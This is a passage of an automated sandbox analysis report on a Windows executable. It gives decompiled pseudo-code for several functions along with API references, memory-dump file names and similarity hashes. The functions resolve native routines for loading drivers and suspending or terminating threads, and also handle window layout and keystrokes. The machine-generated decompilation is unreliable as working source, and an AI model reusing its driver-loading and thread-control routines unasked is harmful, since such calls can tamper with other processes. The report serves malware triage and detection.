							_t83 = _t83 + 0x10;
							E004099ED(_a4 + 0x28,  &_v588);
						} else {
							_t26 = _t66 + 4; // 0x4
							_t72 = _t26;
							if( *_t26 == 0) {
								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
								_t28 = _t81 + 0x20; // 0x20
								memcpy(_t66 + 0x214, _t28, 8);
								_t83 = _t83 + 0x10;
							}
						}
						goto L16;
					}
					_t67 =  *((intOrPtr*)(_t81 + 0x44));
					_t80 = _t47 + 0x28;
					while(1) {
						_t64 = E00405A92(_v12, _t80);
						if( *_t64 == _t67) {
							break;
						}
						_v12 = _v12 + 1;
						if(_v12 < _v16) {
							continue;
						}
						goto L10;
					}
					_t66 = _t64;
					goto L11;
				}
			}

























                                                                                                                                                                                                                          0x004097b1
                                                                                                                                                                                                                          0x004097b9
                                                                                                                                                                                                                          0x004097bb
                                                                                                                                                                                                                          0x004097be
                                                                                                                                                                                                                          0x004097c3
                                                                                                                                                                                                                          0x004097ca
                                                                                                                                                                                                                          0x004097de
                                                                                                                                                                                                                          0x004097de
                                                                                                                                                                                                                          0x004097e3
                                                                                                                                                                                                                          0x004097e5
                                                                                                                                                                                                                          0x004097e5
                                                                                                                                                                                                                          0x004097ec
                                                                                                                                                                                                                          0x004097f3
                                                                                                                                                                                                                          0x004097f6
                                                                                                                                                                                                                          0x004097fe
                                                                                                                                                                                                                          0x00409802
                                                                                                                                                                                                                          0x00409805
                                                                                                                                                                                                                          0x0040980a
                                                                                                                                                                                                                          0x0040980d
                                                                                                                                                                                                                          0x00409810
                                                                                                                                                                                                                          0x00409822
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409827
                                                                                                                                                                                                                          0x0040982a
                                                                                                                                                                                                                          0x004098da
                                                                                                                                                                                                                          0x004098da
                                                                                                                                                                                                                          0x004098dc
                                                                                                                                                                                                                          0x004098e0
                                                                                                                                                                                                                          0x004098e9
                                                                                                                                                                                                                          0x004098ec
                                                                                                                                                                                                                          0x004098f6
                                                                                                                                                                                                                          0x004098f6
                                                                                                                                                                                                                          0x004098e2
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004098e2
                                                                                                                                                                                                                          0x00409830
                                                                                                                                                                                                                          0x00409833
                                                                                                                                                                                                                          0x00409838
                                                                                                                                                                                                                          0x0040983b
                                                                                                                                                                                                                          0x0040983e
                                                                                                                                                                                                                          0x0040985f
                                                                                                                                                                                                                          0x0040985f
                                                                                                                                                                                                                          0x00409861
                                                                                                                                                                                                                          0x00409863
                                                                                                                                                                                                                          0x0040989e
                                                                                                                                                                                                                          0x004098b1
                                                                                                                                                                                                                          0x004098b8
                                                                                                                                                                                                                          0x004098c0
                                                                                                                                                                                                                          0x004098c5
                                                                                                                                                                                                                          0x004098d5
                                                                                                                                                                                                                          0x00409865
                                                                                                                                                                                                                          0x00409865
                                                                                                                                                                                                                          0x00409865
                                                                                                                                                                                                                          0x0040986c
                                                                                                                                                                                                                          0x00409878
                                                                                                                                                                                                                          0x0040987f
                                                                                                                                                                                                                          0x0040988a
                                                                                                                                                                                                                          0x0040988f
                                                                                                                                                                                                                          0x0040988f
                                                                                                                                                                                                                          0x0040986c
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409863
                                                                                                                                                                                                                          0x00409840
                                                                                                                                                                                                                          0x00409843
                                                                                                                                                                                                                          0x00409846
                                                                                                                                                                                                                          0x0040984b
                                                                                                                                                                                                                          0x00409852
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409854
                                                                                                                                                                                                                          0x0040985d
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040985d
                                                                                                                                                                                                                          0x00409894
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409894

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409805
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040988A
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004098C0
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3641025914-0
                                                                                                                                                                                                                          • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                                                                                                                          • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004067AC, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                                          			E004067AC(char** __edi) {
				void* __esi;
				void* _t9;
				void** _t11;
				char** _t15;
				char** _t24;
				void* _t25;
				char* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char** _t33;

				_t24 = __edi;
				 *__edi = "cf@";
				_t9 = E00406746(__edi);
				_t28 = __edi[5];
				if(_t28 != 0) {
					_t9 = E004055D1(_t9, _t28);
					_push(_t28);
					L0040B272();
				}
				_t29 = _t24[4];
				if(_t29 != 0) {
					_t9 = E004055D1(_t9, _t29);
					_push(_t29);
					L0040B272();
				}
				_t30 = _t24[3];
				if(_t30 != 0) {
					_t9 = E004055D1(_t9, _t30);
					_push(_t30);
					L0040B272();
				}
				_t31 = _t24[2];
				if(_t31 != 0) {
					E004055D1(_t9, _t31);
					_push(_t31);
					L0040B272();
				}
				_t15 = _t24;
				_pop(_t32);
				_push(_t24);
				_t33 = _t15;
				_t25 = 0;
				if(_t33[1] > 0 && _t33[0xd] > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
						_t25 = _t25 + 1;
					} while (_t25 < _t33[0xd]);
				}
				_t11 =  *( *_t33)();
				free( *_t11);
				return _t11;
			}














                                                                                                                                                                                                                          0x004067ac
                                                                                                                                                                                                                          0x004067af
                                                                                                                                                                                                                          0x004067b5
                                                                                                                                                                                                                          0x004067ba
                                                                                                                                                                                                                          0x004067bf
                                                                                                                                                                                                                          0x004067c1
                                                                                                                                                                                                                          0x004067c6
                                                                                                                                                                                                                          0x004067c7
                                                                                                                                                                                                                          0x004067cc
                                                                                                                                                                                                                          0x004067cd
                                                                                                                                                                                                                          0x004067d2
                                                                                                                                                                                                                          0x004067d4
                                                                                                                                                                                                                          0x004067d9
                                                                                                                                                                                                                          0x004067da
                                                                                                                                                                                                                          0x004067df
                                                                                                                                                                                                                          0x004067e0
                                                                                                                                                                                                                          0x004067e5
                                                                                                                                                                                                                          0x004067e7
                                                                                                                                                                                                                          0x004067ec
                                                                                                                                                                                                                          0x004067ed
                                                                                                                                                                                                                          0x004067f2
                                                                                                                                                                                                                          0x004067f3
                                                                                                                                                                                                                          0x004067f8
                                                                                                                                                                                                                          0x004067fa
                                                                                                                                                                                                                          0x004067ff
                                                                                                                                                                                                                          0x00406800
                                                                                                                                                                                                                          0x00406805
                                                                                                                                                                                                                          0x00406806
                                                                                                                                                                                                                          0x00406808
                                                                                                                                                                                                                          0x0040680f
                                                                                                                                                                                                                          0x00406810
                                                                                                                                                                                                                          0x00406812
                                                                                                                                                                                                                          0x00406817
                                                                                                                                                                                                                          0x0040681e
                                                                                                                                                                                                                          0x00406828
                                                                                                                                                                                                                          0x0040682b
                                                                                                                                                                                                                          0x0040682c
                                                                                                                                                                                                                          0x0040681e
                                                                                                                                                                                                                          0x00406835
                                                                                                                                                                                                                          0x00406839
                                                                                                                                                                                                                          0x00406841

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                                                                                                                                                                          • free.MSVCRT(00000000), ref: 00406839
                                                                                                                                                                                                                            • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@$free
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2241099983-0
                                                                                                                                                                                                                          • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                                                                                                                          • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00405CF8, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00404FBB(_t30);
				}
				return 1;
			}









                                                                                                                                                                                                                          0x00405d03
                                                                                                                                                                                                                          0x00405d06
                                                                                                                                                                                                                          0x00405d10
                                                                                                                                                                                                                          0x00405d17
                                                                                                                                                                                                                          0x00405d22
                                                                                                                                                                                                                          0x00405d32
                                                                                                                                                                                                                          0x00405d40
                                                                                                                                                                                                                          0x00405d48
                                                                                                                                                                                                                          0x00405d4e
                                                                                                                                                                                                                          0x00405d54
                                                                                                                                                                                                                          0x00405d59
                                                                                                                                                                                                                          0x00405d5c
                                                                                                                                                                                                                          0x00405d61
                                                                                                                                                                                                                          0x00405d67

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00405D0A
                                                                                                                                                                                                                          • GetWindowRect.USER32 ref: 00405D17
                                                                                                                                                                                                                          • GetClientRect.USER32 ref: 00405D22
                                                                                                                                                                                                                          • MapWindowPoints.USER32 ref: 00405D32
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4247780290-0
                                                                                                                                                                                                                          • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                                                                                                                          • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004083DC, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                                                          			E004083DC(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040B26C();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040B272();
				return _t20;
			}











                                                                                                                                                                                                                          0x004083dc
                                                                                                                                                                                                                          0x004083e2
                                                                                                                                                                                                                          0x004083e9
                                                                                                                                                                                                                          0x004083ea
                                                                                                                                                                                                                          0x004083eb
                                                                                                                                                                                                                          0x004083f3
                                                                                                                                                                                                                          0x004083f6
                                                                                                                                                                                                                          0x004083f8
                                                                                                                                                                                                                          0x00408401
                                                                                                                                                                                                                          0x00408404
                                                                                                                                                                                                                          0x00408407
                                                                                                                                                                                                                          0x00408409
                                                                                                                                                                                                                          0x0040840c
                                                                                                                                                                                                                          0x00408413
                                                                                                                                                                                                                          0x0040841d
                                                                                                                                                                                                                          0x00408427
                                                                                                                                                                                                                          0x0040842c
                                                                                                                                                                                                                          0x0040842f
                                                                                                                                                                                                                          0x00408432
                                                                                                                                                                                                                          0x00408435
                                                                                                                                                                                                                          0x00408438
                                                                                                                                                                                                                          0x00408439
                                                                                                                                                                                                                          0x0040843e
                                                                                                                                                                                                                          0x0040843f
                                                                                                                                                                                                                          0x00408442
                                                                                                                                                                                                                          0x0040844a

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$??2@??3@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1252195045-0
                                                                                                                                                                                                                          • Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                                                                                                                          • Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00406746, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                                                                                                          			E00406746(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x30));
				if(_t9 != 0) {
					_push(_t9);
					L0040B272();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x40));
				if(_t10 != 0) {
					_push(_t10);
					L0040B272();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
				if(_t11 != 0) {
					_push(_t11);
					L0040B272();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040B272();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040B272();
				}
				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
				 *((intOrPtr*)(_t19 + 0x30)) = 0;
				 *((intOrPtr*)(_t19 + 0x40)) = 0;
				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
				return _t11;
			}








                                                                                                                                                                                                                          0x00406746
                                                                                                                                                                                                                          0x00406746
                                                                                                                                                                                                                          0x0040674f
                                                                                                                                                                                                                          0x00406751
                                                                                                                                                                                                                          0x00406752
                                                                                                                                                                                                                          0x00406757
                                                                                                                                                                                                                          0x00406758
                                                                                                                                                                                                                          0x0040675d
                                                                                                                                                                                                                          0x0040675f
                                                                                                                                                                                                                          0x00406760
                                                                                                                                                                                                                          0x00406765
                                                                                                                                                                                                                          0x00406766
                                                                                                                                                                                                                          0x0040676e
                                                                                                                                                                                                                          0x00406770
                                                                                                                                                                                                                          0x00406771
                                                                                                                                                                                                                          0x00406776
                                                                                                                                                                                                                          0x00406777
                                                                                                                                                                                                                          0x0040677f
                                                                                                                                                                                                                          0x00406781
                                                                                                                                                                                                                          0x00406785
                                                                                                                                                                                                                          0x00406787
                                                                                                                                                                                                                          0x00406788
                                                                                                                                                                                                                          0x0040678e
                                                                                                                                                                                                                          0x0040678e
                                                                                                                                                                                                                          0x00406790
                                                                                                                                                                                                                          0x00406791
                                                                                                                                                                                                                          0x00406796
                                                                                                                                                                                                                          0x00406798
                                                                                                                                                                                                                          0x0040679e
                                                                                                                                                                                                                          0x004067a1
                                                                                                                                                                                                                          0x004067a4
                                                                                                                                                                                                                          0x004067ab

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                          • Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                                                                                                                          • Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040ABA5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                                                          			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t37;
				intOrPtr _t42;
				RECT* _t44;

				_push(__ecx);
				_push(__ecx);
				_t42 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t37 = _a12;
							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
						}
					} else {
						E00402EC8(__ecx + 0x378);
					}
				} else {
					_v8 = BeginDeferWindowPos(3);
					_t44 = _t42 + 0x378;
					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t44 + 0x10), _t44, 1);
					_t42 = _v12;
				}
				return E00402CED(_t42, _a4, _a8, _a12);
			}









                                                                                                                                                                                                                          0x0040aba8
                                                                                                                                                                                                                          0x0040aba9
                                                                                                                                                                                                                          0x0040abb0
                                                                                                                                                                                                                          0x0040abb2
                                                                                                                                                                                                                          0x0040abb5
                                                                                                                                                                                                                          0x0040ac19
                                                                                                                                                                                                                          0x0040ac2c
                                                                                                                                                                                                                          0x0040ac2e
                                                                                                                                                                                                                          0x0040ac36
                                                                                                                                                                                                                          0x0040ac39
                                                                                                                                                                                                                          0x0040ac39
                                                                                                                                                                                                                          0x0040ac1b
                                                                                                                                                                                                                          0x0040ac21
                                                                                                                                                                                                                          0x0040ac21
                                                                                                                                                                                                                          0x0040abb7
                                                                                                                                                                                                                          0x0040abcb
                                                                                                                                                                                                                          0x0040abce
                                                                                                                                                                                                                          0x0040abd7
                                                                                                                                                                                                                          0x0040abe6
                                                                                                                                                                                                                          0x0040abf6
                                                                                                                                                                                                                          0x0040abfe
                                                                                                                                                                                                                          0x0040ac09
                                                                                                                                                                                                                          0x0040ac0f
                                                                                                                                                                                                                          0x0040ac12
                                                                                                                                                                                                                          0x0040ac4f

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • BeginDeferWindowPos.USER32 ref: 0040ABBA
                                                                                                                                                                                                                            • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                                                                                                                            • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                                                                                                                            • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 0040ABFE
                                                                                                                                                                                                                          • InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                          • API String ID: 2498372239-3993045852
                                                                                                                                                                                                                          • Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                                                                                                                          • Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00403A73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54keyboardwindowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t14;

				if(_a8 == 0x100 && _a12 == 0x41) {
					GetKeyState(0xa2);
					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
							_t14 = E00403A60(0xa5);
							if(_t14 == 0) {
								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
							}
						}
					}
				}
				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
			}




                                                                                                                                                                                                                          0x00403a7d
